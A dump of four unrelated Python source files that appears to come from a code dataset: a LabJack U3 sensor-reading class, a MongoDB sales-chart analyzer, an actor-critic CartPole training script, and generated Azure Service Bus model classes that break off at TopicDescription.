text stringlengths 957 885k |
|---|
<filename>readers/myU3.py
#!/usr/bin/python2.6
'''
Creates a MyU3 class that adds higher-level functionality to the base
LabJack U3 class.
'''
from __future__ import division
import u3
from time import sleep
import math
def getU3(**kargs):
'''Returns an open MyU3 object but retries until successful if errors occur.'''
while True:
try:
return MyU3(**kargs)
except:
sleep(2)
print('Trying to Open U3...')
class MyU3(u3.U3):
'''
Class that adds some functionality to the base u3.U3 class, which
operates a U3 data acquisition device.
'''
def __init__(self, **kargs):
# call the constructor in the base class
u3.U3.__init__(self, **kargs)
def getRMS(self, ch, signalFreq=60, numCycles=4):
'''
Returns the RMS voltage of a stream of readings on a channel.
'ch' is the channel to sample.
'signalFreq' is the fundamental frequency of the signal being sampled.
'numCycles' is the number of full cycles of the signal that you want to
sample for purposes of calculating the RMS value.
I found that for 60 Hz signals, sampling 4 cycles produces stable
readings.
NOTE: there are limits to the frequency calculation below. Getting
a packet from the U3 in streaming mode is limited to 1 second I think,
and it will reduces the # of samples if the frequency is set so that
less than 1200 samples arrive in 1 second.
'''
# There are 1200 samples in one streaming request of the U3. Calculate
# the required streaming frequency from that and the other input parameters.
freq = int(signalFreq / numCycles * 1200.0)
freq = min(50000, freq) # cap at 50 kHz
# the U3 must operate at lower resolution if the streaming is very fast.
if freq < 2500:
resolution = 0
elif freq < 10000:
resolution = 1
elif freq < 20000:
resolution = 2
else:
resolution = 3
self.streamConfig( NumChannels = 1,
PChannels = [ ch ],
NChannels = [ 31 ], # 31 indicates single-ended read
Resolution = resolution,
SampleFrequency = freq )
try:
self.streamStart()
for r in self.streamData():
# calculate the sum of the squares, average that, and take square root
# to determine RMS
vals = r['AIN' + str(ch)]
sum_sqr = reduce(lambda x,y: x + y*y, vals, 0.0)
return math.sqrt(sum_sqr / len(vals))
finally:
self.streamStop()
def getAvg(self, ch, reads=8, specialRange=False, longSettle=True):
'''
Returns an analog reading of channel 'ch', but samples
multiple times = 'reads' and then averages. If 'specialRange'
is True, uses the higher voltage range for the channel.
If 'longSettle' is True, a higher source impedance can be tolerated.
'''
if specialRange:
negCh = 32
else:
negCh = 31
tot = 0.0
for i in range(reads):
tot += self.getAIN(ch, negCh, longSettle=longSettle)
return tot / reads
# Could add a routine to average an analog reading across
# 4 60 Hz cycles using the stream function as in getRMS().
def getDutyCycle(self, timer, reads=8):
'''
Returns the duty cycle measured by a timer. Assumes that the timer is already
set to Mode = 4 for reading duty cycles.
timer - the timer number, either 0 or 1.
reads - the number of times to read the duty cycle and average
'''
tot = 0.0 # used to average the duty cycle readings
for i in range(reads):
val = self.getFeedback(u3.Timer(timer=timer))[0]
hi = float(val % 2**16)
lo = float(val / 2**16)
tot += hi / (lo + hi)
return tot / reads
if __name__=='__main__':
# create the device object
d = MyU3()
# Set all possible inputs to Analog
# Create a bit mask indicating which channels are analog:
FIOEIOAnalog = ( 2 ** 16 ) - 1;
fios = FIOEIOAnalog & (0xFF) # the bottom 8 bits
eios = FIOEIOAnalog/256 # shift 8 places to get top 8 bits
d.configIO( FIOAnalog = fios, EIOAnalog = int(eios) )
try:
while True:
#print '%.3f' % d.getAvg(6)
#print '%.2f' % ( (d.getAvg(30) - 273.15)*1.8 + 32.0 )
print '%.3f' % d.getRMS(6)
sleep(0.5)
finally:
d.close() |
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
from numpy import ceil, floor
class SoldNumberAnalyzer:
""" 商品销量分析器,由 keywords, 价格生成堆栈图 """
def __init__(self, keywords, db, div=10):
"""
:param keywords: 一个关键词的字典, 关键词的值为一个包含可能的, 示例:
{'小米': ['米', 'mi'], '苹果': ['苹果', 'apple', 'iphone']}
:param db: 一个 pymongo.MongoClient.db 的实例
:param div: 划分的价格区间数
"""
self.keywords = keywords
self.__db = db
self.div = div
def __count_by_price(self):
"""
在某一品牌下,对某一价格进行计数,存储至 self.__sold 中
"""
self.__sold = dict()
# initialize the sold dict
for k in self.keywords.keys():
self.__sold[k] = dict()
items = list(self.__db.items.find({'is_crawled': True}))
count = 0
items_len = self.__db.items.count({'is_crawled': True})
for item in items:
count += 1
print('read_rates_by_brand: ({}/{})'.format(count, items_len))
for brand, keywords_list in self.keywords.items():
for keyword in keywords_list:
# if keyword is in the item title.
if keyword in item['title'].lower():
# find rate via item_id
self.__sold[brand][float(item['price'])] = self.__sold[brand].get(float(item['price']),
0) + self.__db.rates.count(
{'item_id': item['item_id']})
print(self.__sold)
def __get_sold(self, lower, upper, brand):
"""
获取某品牌价格位于[lower,upper)区间的销量
:param lower: 查询的价格下界
:param upper: 查询的价格上界
:param brand: 品牌
:return: 销量
"""
data = self.__sold[brand]
sum = 0
for price, count in data.items():
if lower <= price < upper:
sum += count
return sum
def __draw_stack_chart(self, div):
"""
画堆栈图
:param div: 划分区间数
:return: 一个 matplotlib.pyplot 实例
"""
prices_list = []
for i in self.__sold.values():
for j in i.keys():
prices_list.append(j)
min_price = int(floor(min(prices_list)))
max_price = int(ceil(max(prices_list)))
# generate the price sequence from max price and min price
prices_seq = list(range(min_price, max_price, int((max_price - min_price) / div)))
if prices_seq[-1] != max_price:
prices_seq.append(max_price)
# generate the related sold list
temp = prices_seq.copy()
temp.append(max_price + 1)
brands = list(self.keywords.keys())
counts = []
for brand in brands:
temp_list = list()
for i in range(len(temp) - 1):
temp_list.append(self.__get_sold(temp[i], temp[i + 1], brand))
counts.append(temp_list)
plt.figure(figsize=(15, 5))
plt.style.use('ggplot')
plt.stackplot(prices_seq, counts, labels=brands)
plt.legend(loc='best')
plt.tick_params(top='off', right='off')
return plt
def run(self):
"""
运行商品销量分析器,画出堆栈图。
:return: 一个 matplotlib.pyplot 实例
"""
self.__count_by_price()
return self.__draw_stack_chart(self.div)
|
import gym
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
#Hyperparameters
learning_rate = 0.0002
gamma = 0.98
n_rollout = 10
class ActorCritic(nn.Module):
def __init__(self):
super(ActorCritic, self).__init__()
self.data = []
self.fc1 = nn.Linear(4,256)
self.fc_pi = nn.Linear(256,2)
self.fc_v = nn.Linear(256,1)
self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)
def pi(self, x, softmax_dim = 0):
x = F.relu(self.fc1(x))
x = self.fc_pi(x)
prob = F.softmax(x, dim=softmax_dim)
return prob
def v(self, x):
x = F.relu(self.fc1(x))
v = self.fc_v(x)
return v
def put_data(self, transition):
self.data.append(transition)
def make_batch(self):
s_lst, a_lst, r_lst, s_prime_lst, done_lst = [], [], [], [], []
for transition in self.data:
s,a,r,s_prime,done = transition
s_lst.append(s)
a_lst.append([a])
r_lst.append([r/100.0])
s_prime_lst.append(s_prime)
done_mask = 0.0 if done else 1.0
done_lst.append([done_mask])
s_batch, a_batch, r_batch, s_prime_batch, done_batch = torch.tensor(s_lst, dtype=torch.float), torch.tensor(a_lst), \
torch.tensor(r_lst, dtype=torch.float), torch.tensor(s_prime_lst, dtype=torch.float), \
torch.tensor(done_lst, dtype=torch.float)
self.data = []
return s_batch, a_batch, r_batch, s_prime_batch, done_batch
def train_net(self):
s, a, r, s_prime, done = self.make_batch()
td_target = r + gamma * self.v(s_prime) * done
delta = td_target - self.v(s)
pi = self.pi(s, softmax_dim=1)
pi_a = pi.gather(1,a)
loss = -torch.log(pi_a) * delta.detach() + F.smooth_l1_loss(self.v(s), td_target.detach())
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
def main():
env = gym.make('CartPole-v1')
model = ActorCritic()
print_interval = 20
score = 0.0
for n_epi in range(10000):
done = False
s = env.reset()
while not done:
for t in range(n_rollout):
prob = model.pi(torch.from_numpy(s).float())
m = Categorical(prob)
a = m.sample().item()
s_prime, r, done, info = env.step(a)
model.put_data((s,a,r,s_prime,done))
s = s_prime
score += r
if done:
break
model.train_net()
if n_epi%print_interval==0 and n_epi!=0:
print("# of episode :{}, avg score : {:.1f}".format(n_epi, score/print_interval))
score = 0.0
env.close()
if __name__ == '__main__':
main() |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AuthorizationRule(msrest.serialization.Model):
"""Authorization rule of an entity.
:param type:
:type type: str
:param claim_type:
:type claim_type: str
:param claim_value:
:type claim_value: str
:param rights: Access rights of the entity. Values are 'Send', 'Listen', or 'Manage'.
:type rights: list[str]
:param created_time: The date and time when the authorization rule was created.
:type created_time: ~datetime.datetime
:param modified_time: The date and time when the authorization rule was modified.
:type modified_time: ~datetime.datetime
:param key_name: The authorization rule key name.
:type key_name: str
:param primary_key: The primary key of the authorization rule.
:type primary_key: str
:param secondary_key: The primary key of the authorization rule.
:type secondary_key: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True, 'prefix': 'i', 'ns': 'http://www.w3.org/2001/XMLSchema-instance'}},
'claim_type': {'key': 'ClaimType', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'claim_value': {'key': 'ClaimValue', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'rights': {'key': 'Rights', 'type': '[str]', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AccessRights', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'created_time': {'key': 'CreatedTime', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'modified_time': {'key': 'ModifiedTime', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'key_name': {'key': 'KeyName', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'primary_key': {'key': 'PrimaryKey', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'secondary_key': {'key': 'SecondaryKey', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
}
_xml_map = {
'name': 'AuthorizationRule', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
}
def __init__(
self,
**kwargs
):
super(AuthorizationRule, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.claim_type = kwargs.get('claim_type', None)
self.claim_value = kwargs.get('claim_value', None)
self.rights = kwargs.get('rights', None)
self.created_time = kwargs.get('created_time', None)
self.modified_time = kwargs.get('modified_time', None)
self.key_name = kwargs.get('key_name', None)
self.primary_key = kwargs.get('primary_key', None)
self.secondary_key = kwargs.get('secondary_key', None)
class CreateQueueBody(msrest.serialization.Model):
"""The request body for creating a queue.
:param content: QueueDescription for the new queue.
:type content: ~azure.servicebus.management._generated.models.CreateQueueBodyContent
"""
_attribute_map = {
'content': {'key': 'content', 'type': 'CreateQueueBodyContent'},
}
_xml_map = {
'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(CreateQueueBody, self).__init__(**kwargs)
self.content = kwargs.get('content', None)
class CreateQueueBodyContent(msrest.serialization.Model):
"""QueueDescription for the new queue.
:param type: MIME type of content.
:type type: str
:param queue_description: Properties of the new queue.
:type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
}
_xml_map = {
'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(CreateQueueBodyContent, self).__init__(**kwargs)
self.type = kwargs.get('type', "application/xml")
self.queue_description = kwargs.get('queue_description', None)
class CreateTopicBody(msrest.serialization.Model):
"""The request body for creating a topic.
:param content: TopicDescription for the new topic.
:type content: ~azure.servicebus.management._generated.models.CreateTopicBodyContent
"""
_attribute_map = {
'content': {'key': 'content', 'type': 'CreateTopicBodyContent'},
}
_xml_map = {
'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(CreateTopicBody, self).__init__(**kwargs)
self.content = kwargs.get('content', None)
class CreateTopicBodyContent(msrest.serialization.Model):
"""TopicDescription for the new topic.
:param type: MIME type of content.
:type type: str
:param topic_description: Topic information to create.
:type topic_description: ~azure.servicebus.management._generated.models.TopicDescription
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
'topic_description': {'key': 'TopicDescription', 'type': 'TopicDescription'},
}
_xml_map = {
'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(CreateTopicBodyContent, self).__init__(**kwargs)
self.type = kwargs.get('type', "application/xml")
self.topic_description = kwargs.get('topic_description', None)
class MessageCountDetails(msrest.serialization.Model):
"""Details about the message counts in queue.
:param active_message_count: Number of active messages in the queue, topic, or subscription.
:type active_message_count: int
:param dead_letter_message_count: Number of messages that are dead lettered.
:type dead_letter_message_count: int
:param scheduled_message_count: Number of scheduled messages.
:type scheduled_message_count: int
:param transfer_dead_letter_message_count: Number of messages transferred into dead letters.
:type transfer_dead_letter_message_count: int
:param transfer_message_count: Number of messages transferred to another queue, topic, or
subscription.
:type transfer_message_count: int
"""
_attribute_map = {
'active_message_count': {'key': 'ActiveMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
'dead_letter_message_count': {'key': 'DeadLetterMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
'scheduled_message_count': {'key': 'ScheduledMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
'transfer_dead_letter_message_count': {'key': 'TransferDeadLetterMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
'transfer_message_count': {'key': 'TransferMessageCount', 'type': 'int', 'xml': {'prefix': 'd2p1', 'ns': 'http://schemas.microsoft.com/netservices/2011/06/servicebus'}},
}
_xml_map = {
'name': 'CountDetails', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
}
def __init__(
self,
**kwargs
):
super(MessageCountDetails, self).__init__(**kwargs)
self.active_message_count = kwargs.get('active_message_count', None)
self.dead_letter_message_count = kwargs.get('dead_letter_message_count', None)
self.scheduled_message_count = kwargs.get('scheduled_message_count', None)
self.transfer_dead_letter_message_count = kwargs.get('transfer_dead_letter_message_count', None)
self.transfer_message_count = kwargs.get('transfer_message_count', None)
class QueueDescription(msrest.serialization.Model):
"""Description of a Service Bus queue resource.
:param authorization_rules: Authorization rules for resource.
:type authorization_rules:
list[~azure.servicebus.management._generated.models.AuthorizationRule]
:param auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the queue is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:param created_at: The exact time the queue was created.
:type created_at: ~datetime.datetime
:param dead_lettering_on_message_expiration: A value that indicates whether this queue has dead
letter support when a message expires.
:type dead_lettering_on_message_expiration: bool
:param default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:param duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:param entity_availability_status: Availibility status of the entity. Possible values include:
"Available", "Limited", "Renaming", "Restoring", "Unknown".
:type entity_availability_status: str or
~azure.servicebus.management._generated.models.EntityAvailabilityStatus
:param enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:param enable_express: A value that indicates whether Express Entities are enabled. An express
queue holds a message in memory temporarily before writing it to persistent storage.
:type enable_express: bool
:param enable_partitioning: A value that indicates whether the queue is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:param is_anonymous_accessible: A value indicating if the resource can be accessed without
authorization.
:type is_anonymous_accessible: bool
:param lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
that the message is locked for other receivers. The maximum value for LockDuration is 5
minutes; the default value is 1 minute.
:type lock_duration: ~datetime.timedelta
:param max_delivery_count: The maximum delivery count. A message is automatically deadlettered
after this number of deliveries. Default value is 10.
:type max_delivery_count: int
:param max_size_in_megabytes: The maximum size of the queue in megabytes, which is the size of
memory allocated for the queue.
:type max_size_in_megabytes: int
:param requires_duplicate_detection: A value indicating if this queue requires duplicate
detection.
:type requires_duplicate_detection: bool
:param requires_session: A value that indicates whether the queue supports the concept of
sessions.
:type requires_session: bool
:param status: Status of a Service Bus resource. Possible values include: "Active", "Creating",
"Deleting", "Disabled", "ReceiveDisabled", "Renaming", "Restoring", "SendDisabled", "Unknown".
:type status: str or ~azure.servicebus.management._generated.models.EntityStatus
:param support_ordering: A value that indicates whether the queue supports ordering.
:type support_ordering: bool
:param accessed_at: Last time a message was sent, or the last time there was a receive request
to this queue.
:type accessed_at: ~datetime.datetime
:param updated_at: The exact time a message was updated in the queue.
:type updated_at: ~datetime.datetime
:param size_in_bytes: The size of the queue, in bytes.
:type size_in_bytes: int
:param message_count: The number of messages in the queue.
:type message_count: int
:param message_count_details: Details about the message counts in queue.
:type message_count_details: ~azure.servicebus.management._generated.models.MessageCountDetails
"""
_attribute_map = {
'authorization_rules': {'key': 'AuthorizationRules', 'type': '[AuthorizationRule]', 'xml': {'name': 'AuthorizationRules', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect', 'wrapped': True, 'itemsName': 'AuthorizationRule', 'itemsNs': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'auto_delete_on_idle': {'key': 'AutoDeleteOnIdle', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'created_at': {'key': 'CreatedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'dead_lettering_on_message_expiration': {'key': 'DeadLetteringOnMessageExpiration', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'default_message_time_to_live': {'key': 'DefaultMessageTimeToLive', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'duplicate_detection_history_time_window': {'key': 'DuplicateDetectionHistoryTimeWindow', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'entity_availability_status': {'key': 'EntityAvailabilityStatus', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'enable_batched_operations': {'key': 'EnableBatchedOperations', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'enable_express': {'key': 'EnableExpress', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'enable_partitioning': {'key': 'EnablePartitioning', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'is_anonymous_accessible': {'key': 'IsAnonymousAccessible', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'lock_duration': {'key': 'LockDuration', 'type': 'duration', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'max_delivery_count': {'key': 'MaxDeliveryCount', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'max_size_in_megabytes': {'key': 'MaxSizeInMegabytes', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'requires_duplicate_detection': {'key': 'RequiresDuplicateDetection', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'requires_session': {'key': 'RequiresSession', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'status': {'key': 'Status', 'type': 'str', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'support_ordering': {'key': 'SupportOrdering', 'type': 'bool', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'accessed_at': {'key': 'AccessedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'updated_at': {'key': 'UpdatedAt', 'type': 'iso-8601', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'size_in_bytes': {'key': 'SizeInBytes', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'message_count': {'key': 'MessageCount', 'type': 'int', 'xml': {'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'}},
'message_count_details': {'key': 'MessageCountDetails', 'type': 'MessageCountDetails'},
}
_xml_map = {
'name': 'QueueDescription', 'ns': 'http://schemas.microsoft.com/netservices/2010/10/servicebus/connect'
}
def __init__(
self,
**kwargs
):
super(QueueDescription, self).__init__(**kwargs)
self.authorization_rules = kwargs.get('authorization_rules', None)
self.auto_delete_on_idle = kwargs.get('auto_delete_on_idle', None)
self.created_at = kwargs.get('created_at', None)
self.dead_lettering_on_message_expiration = kwargs.get('dead_lettering_on_message_expiration', None)
self.default_message_time_to_live = kwargs.get('default_message_time_to_live', None)
self.duplicate_detection_history_time_window = kwargs.get('duplicate_detection_history_time_window', None)
self.entity_availability_status = kwargs.get('entity_availability_status', None)
self.enable_batched_operations = kwargs.get('enable_batched_operations', None)
self.enable_express = kwargs.get('enable_express', None)
self.enable_partitioning = kwargs.get('enable_partitioning', None)
self.is_anonymous_accessible = kwargs.get('is_anonymous_accessible', None)
self.lock_duration = kwargs.get('lock_duration', None)
self.max_delivery_count = kwargs.get('max_delivery_count', None)
self.max_size_in_megabytes = kwargs.get('max_size_in_megabytes', None)
self.requires_duplicate_detection = kwargs.get('requires_duplicate_detection', None)
self.requires_session = kwargs.get('requires_session', None)
self.status = kwargs.get('status', None)
self.support_ordering = kwargs.get('support_ordering', None)
self.accessed_at = kwargs.get('accessed_at', None)
self.updated_at = kwargs.get('updated_at', None)
self.size_in_bytes = kwargs.get('size_in_bytes', None)
self.message_count = kwargs.get('message_count', None)
self.message_count_details = kwargs.get('message_count_details', None)
class QueueDescriptionEntry(msrest.serialization.Model):
"""Represents an entry in the feed when querying queues.
:param base: Base URL for the query.
:type base: str
:param id: The URL of the GET request.
:type id: str
:param title: The name of the queue.
:type title: ~azure.servicebus.management._generated.models.ResponseTitle
:param published: The timestamp for when this queue was published.
:type published: ~datetime.datetime
:param updated: The timestamp for when this queue was last updated.
:type updated: ~datetime.datetime
:param author: The author that created this resource.
:type author: ~azure.servicebus.management._generated.models.ResponseAuthor
:param link: The URL for the HTTP request.
:type link: ~azure.servicebus.management._generated.models.ResponseLink
:param content: The QueueDescription.
:type content: ~azure.servicebus.management._generated.models.QueueDescriptionEntryContent
"""
_attribute_map = {
'base': {'key': 'base', 'type': 'str', 'xml': {'name': 'base', 'attr': True, 'prefix': 'xml'}},
'id': {'key': 'id', 'type': 'str'},
'title': {'key': 'title', 'type': 'ResponseTitle'},
'published': {'key': 'published', 'type': 'iso-8601'},
'updated': {'key': 'updated', 'type': 'iso-8601'},
'author': {'key': 'author', 'type': 'ResponseAuthor'},
'link': {'key': 'link', 'type': 'ResponseLink'},
'content': {'key': 'content', 'type': 'QueueDescriptionEntryContent'},
}
_xml_map = {
'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(QueueDescriptionEntry, self).__init__(**kwargs)
self.base = kwargs.get('base', None)
self.id = kwargs.get('id', None)
self.title = kwargs.get('title', None)
self.published = kwargs.get('published', None)
self.updated = kwargs.get('updated', None)
self.author = kwargs.get('author', None)
self.link = kwargs.get('link', None)
self.content = kwargs.get('content', None)
class QueueDescriptionEntryContent(msrest.serialization.Model):
"""The QueueDescription.
:param type: Type of content in queue response.
:type type: str
:param queue_description: Description of a Service Bus queue resource.
:type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
}
def __init__(
self,
**kwargs
):
super(QueueDescriptionEntryContent, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.queue_description = kwargs.get('queue_description', None)
class QueueDescriptionFeed(msrest.serialization.Model):
"""Response from listing Service Bus queues.
:param id: URL of the list queues query.
:type id: str
:param title: The entity type for the feed.
:type title: str
:param updated: Datetime of the query.
:type updated: ~datetime.datetime
:param link: Links to paginated response.
:type link: list[~azure.servicebus.management._generated.models.ResponseLink]
:param entry: Queue entries.
:type entry: list[~azure.servicebus.management._generated.models.QueueDescriptionEntry]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'title': {'key': 'title', 'type': 'str'},
'updated': {'key': 'updated', 'type': 'iso-8601'},
'link': {'key': 'link', 'type': '[ResponseLink]'},
'entry': {'key': 'entry', 'type': '[QueueDescriptionEntry]'},
}
_xml_map = {
'name': 'feed', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(QueueDescriptionFeed, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.title = kwargs.get('title', None)
self.updated = kwargs.get('updated', None)
self.link = kwargs.get('link', None)
self.entry = kwargs.get('entry', None)
class QueueDescriptionResponse(msrest.serialization.Model):
"""The response from a Queue_Get operation.
:param id: The URL of the GET request.
:type id: str
:param title: The name of the queue.
:type title: str
:param published: The timestamp for when this queue was published.
:type published: str
:param updated: The timestamp for when this queue was last updated.
:type updated: str
:param author: The author that created this resource.
:type author: ~azure.servicebus.management._generated.models.ResponseAuthor
:param link: The URL for the HTTP request.
:type link: ~azure.servicebus.management._generated.models.ResponseLink
:param content: Contents of a Queue_Get response.
:type content: ~azure.servicebus.management._generated.models.QueueDescriptionResponseContent
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'title': {'key': 'title', 'type': 'str'},
'published': {'key': 'published', 'type': 'str'},
'updated': {'key': 'updated', 'type': 'str'},
'author': {'key': 'author', 'type': 'ResponseAuthor'},
'link': {'key': 'link', 'type': 'ResponseLink'},
'content': {'key': 'content', 'type': 'QueueDescriptionResponseContent'},
}
_xml_map = {
'name': 'entry', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(QueueDescriptionResponse, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.title = kwargs.get('title', None)
self.published = kwargs.get('published', None)
self.updated = kwargs.get('updated', None)
self.author = kwargs.get('author', None)
self.link = kwargs.get('link', None)
self.content = kwargs.get('content', None)
class QueueDescriptionResponseContent(msrest.serialization.Model):
"""Contents of a Queue_Get response.
:param type: Type of content in queue response.
:type type: str
:param queue_description: Description of a Service Bus queue resource.
:type queue_description: ~azure.servicebus.management._generated.models.QueueDescription
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
'queue_description': {'key': 'QueueDescription', 'type': 'QueueDescription'},
}
def __init__(
self,
**kwargs
):
super(QueueDescriptionResponseContent, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.queue_description = kwargs.get('queue_description', None)
class ResponseAuthor(msrest.serialization.Model):
"""The author that created this resource.
:param name: The Service Bus namespace.
:type name: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResponseAuthor, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
class ResponseLink(msrest.serialization.Model):
"""The URL for the HTTP request.
:param href: The URL of the GET request.
:type href: str
:param rel: What the link href is relative to.
:type rel: str
"""
_attribute_map = {
'href': {'key': 'href', 'type': 'str', 'xml': {'attr': True}},
'rel': {'key': 'rel', 'type': 'str', 'xml': {'attr': True}},
}
_xml_map = {
'name': 'link', 'ns': 'http://www.w3.org/2005/Atom'
}
def __init__(
self,
**kwargs
):
super(ResponseLink, self).__init__(**kwargs)
self.href = kwargs.get('href', None)
self.rel = kwargs.get('rel', None)
class ResponseTitle(msrest.serialization.Model):
"""The title of the response.
:param type: Type of value.
:type type: str
:param title: Contents of the title.
:type title: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str', 'xml': {'attr': True}},
'title': {'key': 'title', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResponseTitle, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.title = kwargs.get('title', None)
class ServiceBusManagementError(msrest.serialization.Model):
"""The error response from Service Bus.
:param code: The service error code.
:type code: int
:param detail: The service error message.
:type detail: str
"""
_attribute_map = {
'code': {'key': 'Code', 'type': 'int'},
'detail': {'key': 'Detail', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusManagementError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.detail = kwargs.get('detail', None)
class TopicDescription(msrest.serialization.Model):
